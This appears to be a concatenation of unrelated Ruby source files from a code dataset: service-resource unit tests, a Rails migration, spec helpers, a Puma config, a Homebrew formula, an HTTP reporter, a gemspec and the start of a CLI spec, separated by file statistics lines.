resource = MockLoader.new(:centos7).load_resource('systemd_service', 'sshd', '/path/to/systemctl')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'UnitFileState' => 'enabled', 'SubState' => 'running' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify centos 7 service parsing with static loaded service' do
resource = MockLoader.new(:centos7).load_resource('service', 'dbus')
params = Hashie::Mash.new({ 'Description' => 'D-Bus System Message Bus', 'Id' => 'dbus.service', 'LoadState' => 'loaded', 'Names' => 'messagebus.service dbus.service', 'SubState' => 'running', 'UnitFileState' => 'static' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'dbus.service'
_(resource.description).must_equal 'D-Bus System Message Bus'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_equal 'static'
end
# cloudlinux 7 with systemd
it 'verify cloudlinux 7 service parsing' do
resource = MockLoader.new(:cloudlinux).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify cloudlinux 7 service parsing with systemd_service and service_ctl override' do
resource = MockLoader.new(:cloudlinux).load_resource('systemd_service', 'sshd', '/path/to/systemctl')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'UnitFileState' => 'enabled', 'SubState' => 'running' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify cloudlinux 7 service parsing with static loaded service' do
resource = MockLoader.new(:cloudlinux).load_resource('service', 'dbus')
params = Hashie::Mash.new({ 'Description' => 'D-Bus System Message Bus', 'Id' => 'dbus.service', 'LoadState' => 'loaded', 'Names' => 'messagebus.service dbus.service', 'SubState' => 'running', 'UnitFileState' => 'static' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'dbus.service'
_(resource.description).must_equal 'D-Bus System Message Bus'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
_(resource.params.UnitFileState).must_equal 'static'
end
# freebsd
it 'verify freebsd10 service parsing' do
resource = MockLoader.new(:freebsd10).load_resource('service', 'sendmail')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'bsd-init'
_(resource.name).must_equal 'sendmail'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify freebsd10 service parsing with default bsd_service' do
resource = MockLoader.new(:freebsd10).load_resource('bsd_service', 'sendmail')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'bsd-init'
_(resource.name).must_equal 'sendmail'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# arch linux with systemd
it 'verify arch linux service parsing' do
resource = MockLoader.new(:arch).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# coreos linux with systemd
it 'verify coreos linux service parsing' do
resource = MockLoader.new(:coreos).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# debian 7 with systemv
it 'verify debian 7 service parsing' do
resource = MockLoader.new(:debian7).load_resource('service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# debian 8 with systemd
it 'verify debian 8 service parsing' do
resource = MockLoader.new(:debian8).load_resource('service', 'sshd')
params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# debian 8 with systemd but no service file
it 'gets the correct service info when the `.service` file is missing' do
resource = MockLoader.new(:debian8).load_resource('service', 'apache2')
params = Hashie::Mash.new(
'ActiveState' => 'active',
'Description' => 'LSB: Apache2 web server',
'Id' => 'apache2.service',
'LoadState' => 'loaded',
'Names' => 'apache2.service',
'SubState' => 'running',
'UnitFileState' => ''
)
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'apache2.service'
_(resource.description).must_equal 'LSB: Apache2 web server'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# macos test
it 'verify mac osx service parsing' do
resource = MockLoader.new(:osx104).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'darwin'
_(resource.name).must_equal 'org.openbsd.ssh-agent'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify mac osx service parsing with not-running service' do
resource = MockLoader.new(:osx104).load_resource('service', 'FilesystemUI')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'darwin'
_(resource.name).must_equal 'com.apple.FilesystemUI'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal false
_(resource.params).must_equal params
end
it 'verify mac osx service parsing with default launchd_service' do
resource = MockLoader.new(:osx104).load_resource('launchd_service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'darwin'
_(resource.name).must_equal 'org.openbsd.ssh-agent'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# wrlinux
it 'verify wrlinux service parsing' do
resource = MockLoader.new(:wrlinux).load_resource('service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# unknown OS
it 'verify service handling on unsupported os' do
resource = MockLoader.new(:undefined).load_resource('service', 'dhcp')
params = Hashie::Mash.new({})
_(resource.installed?).must_equal false
_(resource.description).must_be_nil
_(resource.params).must_equal params
end
# runlevel detection
describe 'runlevels on centos 6 (system V)' do
let(:service) { MockLoader.new(:centos6).load_resource('service', 'sshd') }
it 'grabs all runlevels' do
service.runlevels.keys.must_equal [0, 1, 2, 3, 4, 5, 6]
end
it 'grabs runlevels via filter nil' do
service.runlevels(nil).keys.must_equal [0, 1, 2, 3, 4, 5, 6]
end
it 'grabs runlevels by number' do
service.runlevels(3).keys.must_equal [3]
end
it 'grabs runlevels by multiple numbers' do
service.runlevels(3, 4, 8).keys.must_equal [3, 4]
end
it 'grabs runlevels via regex' do
service.runlevels(/[5-9]/).keys.must_equal [5, 6]
end
it 'checks enabled true if all services are enabled' do
service.runlevels(2, 4).enabled?.must_equal true
end
it 'checks enabled false if some services are not enabled' do
service.runlevels(1, 4).enabled?.must_equal false
end
it 'checks disabled true if all services are disabled' do
service.runlevels(0, 1).disabled?.must_equal true
end
it 'checks disabled false if some services are not disabled' do
  # The description tests disabled?, but the assertion previously called
  # enabled? (which also happened to be false for runlevels 0 and 4, so
  # the test passed without exercising the intended predicate).
  service.runlevels(0, 4).disabled?.must_equal false
end
end
end
| 43.871179 | 233 | 0.702981 |
1ac1d1b7cb060e9c82a293feaa8fbd781548e351 | 275 | class CreateInvitations < ActiveRecord::Migration[5.2]
def change
create_table :invitations do |t|
t.integer :user_invita
t.integer :user_invitado
t.date :fecha
t.integer :local_id
t.boolean :confirma
t.timestamps
end
end
end
| 19.642857 | 54 | 0.661818 |
e82cc30b6b98651c69c510ff7835169719bdceb0 | 226 | require 'spec_helper_system'
# System-level smoke test: applying the phpapc class should converge cleanly.
describe 'basic tests' do
it 'class should work without errors' do
pp = <<-EOS
class { 'phpapc': }
EOS
# exit code 2 means "run succeeded, changes were applied" when puppet
# runs with --detailed-exitcodes
puppet_apply(pp) do |r|
r.exit_code.should == 2
end
end
end
| 16.142857 | 42 | 0.615044 |
5d2d98c628975235e249622c59ba03d76e9e2d5e | 1,133 | module QuickSearch::OnCampus
extend ActiveSupport::Concern
private
# Search for "Nucleation and growth mechanism of ferroelectric domain wall motion"
# To test this. Result should not show up in Summon results off campus.
### WHY THIS IS HERE ###
# There is a subset of Summon results that cannot be shown unless a person is
# on campus or authenticated. So that we can show all results to people
# searching QuickSearch from on campus we're checking IP addresses. If the IP is a
# known campus IP we set the s.role=authenticated parameter in the Summon API request.
def ip
request.env['HTTP_X_FORWARDED_FOR'] || request.remote_ip
end
def on_campus?(ip)
ip = remote_ip(ip)
ip_range_check(ip)
end
# To spoof ON and OFF campus for development
def remote_ip(ip)
if ip == '127.0.0.1'
'204.84.244.1' #On Campus
#'127.0.0.1' #Off Campus
else
ip
end
end
def ip_range_check(ip)
QuickSearch::Engine::APP_CONFIG['on_campus'].each do |on_campus_ip_regex|
if on_campus_ip_regex === ip
return true
end
end
return false
end
end
| 25.75 | 88 | 0.690203 |
081c2e825d0feeffd13b4cde3048ebb363546088 | 882 | # Test coverage startup
if ENV['SIMPLECOV']
# Set the environment variable if you want to generate a detailed
# coverage report on your local box
require "simplecov"
SimpleCov.start
end
def stub_random_iv
before do
cipher = OpenSSL::Cipher.new(ClaimToken.configuration.cipher_type)
allow(cipher).to receive(:random_iv).and_return("\nK\x0F^1X\xE6\x8A'\xDBf\xB8\x93i\xA3\x9D")
allow(OpenSSL::Cipher).to receive(:new).and_return(cipher)
end
end
def use_test_configuration
before do
ClaimToken.configure do |config|
config.shared_encryption_key = "fba0d989f259ad36ada12c127356d420"
config.digest_secret = "d22b90c9172649eaf49cd185f73bd4a53ec3ff4dc6f7d51f9dbaac62421e6dd297b38efcd431a7f2"
end
end
after do
restore_default_config
end
end
def restore_default_config
ClaimToken.configuration = nil
ClaimToken.configure {}
end
| 25.941176 | 111 | 0.772109 |
bf8261feebd3c0ae1cef0bdd87ed1c32068415a4 | 1,314 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/private_catalog/v1beta1/private_catalog"
require "google/cloud/private_catalog/v1beta1/version"
module Google
module Cloud
module PrivateCatalog
##
# To load this package, including all its services, and instantiate a client:
#
# @example
#
# require "google/cloud/private_catalog/v1beta1"
# client = ::Google::Cloud::PrivateCatalog::V1beta1::PrivateCatalog::Client.new
#
module V1beta1
end
end
end
end
helper_path = ::File.join __dir__, "v1beta1", "_helpers.rb"
require "google/cloud/private_catalog/v1beta1/_helpers" if ::File.file? helper_path
| 32.04878 | 89 | 0.728311 |
ab29212ef4ee8778a44024e0fb40b6eedf2f3e40 | 762 | # Puma is a fast, concurrent web server for Ruby & Rack
#
# Learn more at: https://puma.io
#
port ENV.fetch("BRIDGETOWN_PORT") { 4000 }
# You can adjust the number of workers (separate processes) and threads
# (per process) based on your production system
#
if ENV["BRIDGETOWN_ENV"] == "production"
workers ENV.fetch("BRIDGETOWN_CONCURRENCY") { 4 }
end
max_threads_count = ENV.fetch("BRIDGETOWN_MAX_THREADS") { 5 }
min_threads_count = ENV.fetch("BRIDGETOWN_MIN_THREADS") { max_threads_count }
threads min_threads_count, max_threads_count
# Preload the application for maximum performance
#
preload_app!
# Use the Bridgetown logger format
#
require "bridgetown-core/rack/logger"
log_formatter do |msg|
Bridgetown::Rack::Logger.message_with_prefix msg
end
| 27.214286 | 77 | 0.769029 |
21244762bb53dd5595283d86e156a711cc72ea90 | 4,992 | # enabling the load of files from root (on RSpec)
$LOAD_PATH.unshift(File.dirname(__FILE__) + '/../')
require 'rubygems'
require 'spec'
require 'mocha'
require 'restclient'
require 'lib/waz-tables'
describe "Table object behavior" do
it "should initialize a new table" do
table = WAZ::Tables::Table.new({:name => 'tablename', :url => 'http://localhost' })
table.name.should == 'tablename'
table.url.should == 'http://localhost'
end
it "should list tables" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
result = [ {:name => 'table1', :url => 'url1'}, {:name => 'table2', :url => 'url2'} ], nil
WAZ::Tables::Service.any_instance.expects(:list_tables).returns(result)
tables = WAZ::Tables::Table.list
tables.size.should == 2
tables.first().name.should == "table1"
tables.first().url.should == "url1"
tables.last().name.should == "table2"
tables.last().url.should == "url2"
end
it "should find a table by its name and return a WAZ::Tables::Table instance" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:get_table).with('table1').returns({:name => 'table1', :url => 'url1'})
table = WAZ::Tables::Table.find('table1')
table.name.should == "table1"
table.url.should == "url1"
end
it "should return nil when looking for an unexisting table" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:get_table).with('unexistingtable').raises(WAZ::Tables::TableDoesNotExist.new('unexistingtable'))
table = WAZ::Tables::Table.find('unexistingtable')
table.nil?.should == true
end
it "should create table" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:create_table).returns({:name => 'table1', :url => 'http://foo'})
table = WAZ::Tables::Table.create('table1')
table.name.should == "table1"
end
it "should destroy a table" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my_account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:delete_table).with("tabletodelete")
WAZ::Tables::Service.any_instance.expects(:get_table).returns({:name => 'tabletodelete', :url => 'http://localhost'})
table = WAZ::Tables::Table.find('tabletodelete')
table.destroy!
end
it "should throw when not name provided for the table" do
lambda { WAZ::Tables::Table.new({:foo => "bar"}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when table name starts with no lower/upper char" do
lambda { WAZ::Tables::Table.create('9table') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when table contains any other char than letters or digits" do
lambda { WAZ::Tables::Table.create('table-name') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when table name is less than 3" do
lambda { WAZ::Tables::Table.create('t') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when table name is longer than 63" do
lambda { WAZ::Tables::Table.create('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when :url option is not provided" do
lambda { WAZ::Tables::Table.new({:name => 'name'}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when :name option is not provided" do
lambda { WAZ::Tables::Table.new({:url => 'url'}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when :name is empty" do
lambda { WAZ::Tables::Table.new({:name => '', :url => 'url'}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when :url is empty" do
lambda { WAZ::Tables::Table.new({:name => 'name', :url => ''}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when invalid table name is provided" do
  # Table names must start with a letter, contain only letters/digits, and
  # be 3..63 characters long. (An INVALID_TABLE_ERROR_MESSAGE constant was
  # previously assigned here but never read; assigning a constant inside an
  # example also warns "already initialized constant" on repeated runs.)
  options = {:name => '1invalidname', :url => 'url'}
  options.stubs(:keys).returns([:name, :url])
  # NOTE(review): any_instance.stubs(:new) targets an instance method, but
  # .new is a class method — this stub likely has no effect; the real
  # constructor raises anyway. Confirm intent.
  WAZ::Tables::Table.any_instance.stubs(:new).with(options).raises(WAZ::Storage::InvalidParameterValue)
  lambda { WAZ::Tables::Table.new(options) }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
035f44d10206d570627221494963f4d294e62e9b | 74 |
class TopTwo < Top
def initialize
puts 'Depends on Top'
end
end
| 9.25 | 25 | 0.662162 |
e92ab80ddcd5e56cfc4f1b41305c6e6dcee6fd8e | 114 | class AddAboutToUser < ActiveRecord::Migration[5.1]
def change
add_column :users, :about, :string
end
end
| 19 | 51 | 0.72807 |
bba3093ebbd4628317928c0ec13d9b368f7f0e71 | 365 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CDN::Mgmt::V2020_04_15
module Models
#
# Defines values for MinimumTlsVersion
#
module MinimumTlsVersion
None = "None"
TLS10 = "TLS10"
TLS12 = "TLS12"
end
end
end
| 21.470588 | 70 | 0.676712 |
876172bd9acc9569340ea3b149510662f85838f5 | 1,458 | class Allegro < Formula
desc "C/C++ multimedia library for cross-platform game development"
homepage "https://liballeg.org/"
url "https://github.com/liballeg/allegro5/releases/download/5.2.6.0/allegro-5.2.6.0.tar.gz"
sha256 "5de8189ec051e1865f359654f86ec68e2a12a94edd00ad06d1106caa5ff27763"
head "https://github.com/liballeg/allegro5.git"
bottle do
cellar :any
sha256 "9e71511f6c8faa8449dd06bc30bd74497ee832e3e0ca7f3eb02bcef263ab4b3f" => :catalina
sha256 "ead9f69a2af4720ad8a9e020657b1db71e49cb3e83d9d8477d425de9d948ce07" => :mojave
sha256 "4ab4367b267e257a1aeee6cd65301922cf38cb37e8c11865edecedac5960f96e" => :high_sierra
end
depends_on "cmake" => :build
depends_on "dumb"
depends_on "flac"
depends_on "freetype"
depends_on "libogg"
depends_on "libvorbis"
depends_on "opusfile"
depends_on "physfs"
depends_on "theora"
depends_on "webp"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args, "-DWANT_DOCS=OFF"
system "make", "install"
end
end
test do
(testpath/"allegro_test.cpp").write <<~EOS
#include <assert.h>
#include <allegro5/allegro5.h>
int main(int n, char** c) {
if (!al_init()) {
return 1;
}
return 0;
}
EOS
system ENV.cxx, "-I#{include}", "-L#{lib}", "-lallegro", "-lallegro_main",
"-o", "allegro_test", "allegro_test.cpp"
system "./allegro_test"
end
end
| 28.588235 | 93 | 0.679012 |
796860a5315bbbe00b2db2bda41bde77f04b036a | 5,241 | #
# Copyright:: Copyright (c) Chef Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Chef
class Resource
class ChocolateySource < Chef::Resource
unified_mode true
provides :chocolatey_source
description "Use the **chocolatey_source** resource to add, remove, enable, or disable Chocolatey sources."
introduced "14.3"
examples <<~DOC
**Add a Chocolatey source**
```ruby
chocolatey_source 'MySource' do
source 'http://example.com/something'
action :add
end
```
**Remove a Chocolatey source**
```ruby
chocolatey_source 'MySource' do
action :remove
end
```
DOC
property :source_name, String, name_property: true,
description: "An optional property to set the source name if it differs from the resource block's name."
property :source, String,
description: "The source URL."
property :bypass_proxy, [TrueClass, FalseClass], default: false,
description: "Whether or not to bypass the system's proxy settings to access the source."
property :admin_only, [TrueClass, FalseClass], default: false,
description: "Whether or not to set the source to be accessible to only admins.",
introduced: "15.1"
property :allow_self_service, [TrueClass, FalseClass], default: false,
description: "Whether or not to set the source to be used for self service.",
introduced: "15.1"
property :priority, Integer, default: 0,
description: "The priority level of the source."
property :disabled, [TrueClass, FalseClass], default: false, desired_state: false, skip_docs: true
load_current_value do
element = fetch_source_element(source_name)
current_value_does_not_exist! if element.nil?
source_name element["id"]
source element["value"]
bypass_proxy element["bypassProxy"] == "true"
admin_only element["adminOnly"] == "true"
allow_self_service element["selfService"] == "true"
priority element["priority"].to_i
disabled element["disabled"] == "true"
end
# Looks up a <source> element in the Chocolatey config file by its id.
#
# @param [String] id the source name
# @return [REXML::Attributes, nil] the attributes of the matching source
#   element, or nil when no source with that id exists
# @raise [RuntimeError] when the Chocolatey config file cannot be found
def fetch_source_element(id)
require "rexml/document" unless defined?(REXML::Document)
config_file = "#{ENV["ALLUSERSPROFILE"]}\\chocolatey\\config\\chocolatey.config"
raise "Could not find the Chocolatey config at #{config_file}!" unless ::File.exist?(config_file)
config_contents = REXML::Document.new(::File.read(config_file))
data = REXML::XPath.first(config_contents, "//sources/source[@id=\"#{id}\"]")
data ? data.attributes : nil # REXML just returns nil if it can't find anything so avoid an undefined method error
end
action :add, description: "Adds a Chocolatey source" do
raise "#{new_resource}: When adding a Chocolatey source you must pass the 'source' property!" unless new_resource.source
converge_if_changed do
shell_out!(choco_cmd("add"))
end
end
action :remove, description: "Removes a Chocolatey source" do
if current_resource
converge_by("remove Chocolatey source '#{new_resource.source_name}'") do
shell_out!(choco_cmd("remove"))
end
end
end
action :disable, description: "Disables a Chocolatey source." do
if current_resource.disabled != true
converge_by("disable Chocolatey source '#{new_resource.source_name}'") do
shell_out!(choco_cmd("disable"))
end
end
end
action :enable, description: "Enables a Chocolatey source." do
if current_resource.disabled == true
converge_by("enable Chocolatey source '#{new_resource.source_name}'") do
shell_out!(choco_cmd("enable"))
end
end
end
action_class do
# @param [String] action the name of the action to perform
# @return [String] the choco source command string
def choco_cmd(action)
cmd = "#{ENV["ALLUSERSPROFILE"]}\\chocolatey\\bin\\choco source #{action} -n \"#{new_resource.source_name}\""
if action == "add"
cmd << " -s #{new_resource.source} --priority=#{new_resource.priority}"
cmd << " --bypassproxy" if new_resource.bypass_proxy
cmd << " --allowselfservice" if new_resource.allow_self_service
cmd << " --adminonly" if new_resource.admin_only
end
cmd
end
end
end
end
end
| 36.65035 | 128 | 0.643007 |
016871fe83fd24078cb1254be625b641fe91eb81 | 2,555 | require 'logger'
require 'rest_client'
require 'multi_json'
require 'time'
require 'date'
require 'zlib'
require 'fileutils'
class BackdropReporter
def initialize(aggregated_dir, posted_dir, options = {})
@aggregated_dir = aggregated_dir
@posted_dir = posted_dir
@logger = options[:logger] || Logger.new(nil)
@backdrop_endpoint = options[:backdrop_endpoint] || raise("must specify backdrop endpoint")
@bearer_token = options[:bearer_token]
@timeout = options[:timeout] || 10
@open_timeout = options[:open_timeout] || 10
@sub_batch_size = 1000
end
def payload_batches
Enumerator.new do |yielder|
Dir[File.join(@aggregated_dir, "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9].txt.gz")].reject do |path|
already_posted?(path)
end.map do |path|
file_date = File.basename(path, '.txt.gz')
data_batch = Zlib::GzipReader.open(path).map do |line|
count, url = line.strip.split("\t")
{
_id: "#{file_date}-#{url}",
_timestamp: DateTime.parse("#{file_date} 00:00:00 +00:00").iso8601,
url: url,
count: count
}
end
yielder << [file_date, data_batch]
end
end
end
def report!
@logger.info "Posting to #{@backdrop_endpoint}"
payload_batches.each do |file_date, batch|
begin
@logger.info "Posting #{batch.size} items for #{file_date}.."
headers = {
content_type: :json,
accept: :json
}
headers.merge!(authorization: "Bearer #{@bearer_token}") if @bearer_token
batch.each_slice(@sub_batch_size).with_index do |sub_batch, i|
from = i * @sub_batch_size
to = (i + 1) * @sub_batch_size - 1
@logger.info "Posting #{from}-#{to} of #{batch.size} items for #{file_date}.."
RestClient::Request.execute(
method: :post,
url: @backdrop_endpoint,
payload: MultiJson.dump(sub_batch),
headers: headers,
timeout: @timeout,
open_timeout: @open_timeout)
end
FileUtils.touch(File.join(@posted_dir, "#{file_date}.txt.gz"))
@logger.info ".. OK"
rescue RestClient::Exception => e
@logger.error "FAILED to post #{file_date} because #{e}"
@logger.error e.response
end
end
end
def already_posted?(aggregate_file)
posting_file = File.join(@posted_dir, File.basename(aggregate_file))
File.exist?(posting_file) && (File.mtime(posting_file) >= File.mtime(aggregate_file))
end
end | 33.618421 | 107 | 0.607828 |
ff599b6a01d6c84b0aeed1ddb155bb6612e8b1ef | 214 | module WoodShop
# A filter groups the concrete values that products can be matched on.
class Filter < ApplicationRecord
  # Owns its values; destroying a filter removes them as well.
  has_many :filter_values, dependent: :destroy
  # Products and sub-products are reached through the join on filter values.
  has_many :products, through: :filter_values
  has_many :sub_products, through: :filter_values
end
end
| 26.75 | 51 | 0.752336 |
ab3d63a01945f75a487efc2a7e35c8de6fb103c5 | 1,566 | # -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'aliyun/version'
# Gem packaging metadata for the Aliyun OSS (Object Storage Service) SDK.
Gem::Specification.new do |spec|
  spec.name          = 'aliyun-sdk'
  spec.version       = Aliyun::VERSION
  spec.authors       = ['Tianlong Wu']
  spec.email         = ['[email protected]']

  spec.summary       = 'Aliyun OSS SDK for Ruby'
  spec.description   = 'A Ruby program to facilitate accessing Aliyun Object Storage Service'
  spec.homepage      = 'https://github.com/aliyun/aliyun-oss-ruby-sdk'

  # Ship the library, the examples, and the C extension sources.
  spec.files         = Dir.glob("lib/**/*.rb") + Dir.glob("examples/**/*.rb") + Dir.glob("ext/**/*.{rb,c,h}")
  spec.test_files    = Dir.glob("spec/**/*_spec.rb") + Dir.glob("tests/**/*.rb")
  spec.extra_rdoc_files = ['README.md', 'CHANGELOG.md']

  # NOTE(review): bindir points at lib/aliyun while the executables grep
  # matches bin/ paths — confirm this combination is intentional.
  spec.bindir        = 'lib/aliyun'
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.require_paths = ['lib']
  spec.license       = 'MIT'

  # Native CRC extension compiled at install time.
  spec.extensions    = ['ext/crcx/extconf.rb']

  spec.add_dependency 'nokogiri', '~> 1.6', "< 1.7.0"
  spec.add_dependency 'rest-client', '~> 2.0.2'
  spec.add_development_dependency 'bundler', '~> 1.10'
  spec.add_development_dependency 'rake', '~> 10.4'
  spec.add_development_dependency 'rake-compiler', '~> 0.9.0'
  spec.add_development_dependency 'rspec', '~> 3.3'
  spec.add_development_dependency 'webmock', '~> 3.0'
  spec.add_development_dependency 'simplecov', '~> 0.10.0'
  spec.add_development_dependency 'minitest', '~> 5.8'

  spec.required_ruby_version = '>= 1.9.3'
end
| 39.15 | 109 | 0.64304 |
bbb3d44619eb1a1999ba2eda33b9fc81eaf95f1d | 24,718 | require 'spec_helper'
require 'wordlist/cli'
describe Wordlist::CLI do
describe "#initialize" do
it "must default #mode to :read" do
expect(subject.mode).to eq(:read)
end
it "must default #format to nil" do
expect(subject.format).to be(nil)
end
it "must default #command to nil" do
expect(subject.command).to be(nil)
end
it "must default #output to nil" do
expect(subject.output).to be(nil)
end
it "must initialize #option_parser" do
expect(subject.option_parser).to be_kind_of(OptionParser)
end
it "must initialize #operators to []" do
expect(subject.operators).to eq([])
end
it "must initialize #modifiers to []" do
expect(subject.modifiers).to eq([])
end
it "must initialize #build_options to {}" do
expect(subject.builder_options).to eq({})
end
end
describe "#print_error" do
let(:error) { "error!" }
it "must print the program name and the error message to stderr" do
expect {
subject.print_error(error)
}.to output("#{described_class::PROGRAM_NAME}: #{error}#{$/}").to_stderr
end
end
describe "#print_backtrace" do
let(:exception) { RuntimeError.new("error!") }
it "must print the program name and the error message to stderr" do
expect {
subject.print_backtrace(exception)
}.to output(
%r{Oops! Looks like you've found a bug!
Please report the following text to: #{Regexp.escape(described_class::BUG_REPORT_URL)}
```}m
).to_stderr
end
end
let(:fixtures_dir) { File.join(__dir__,'fixtures') }
describe "#open_wordlist" do
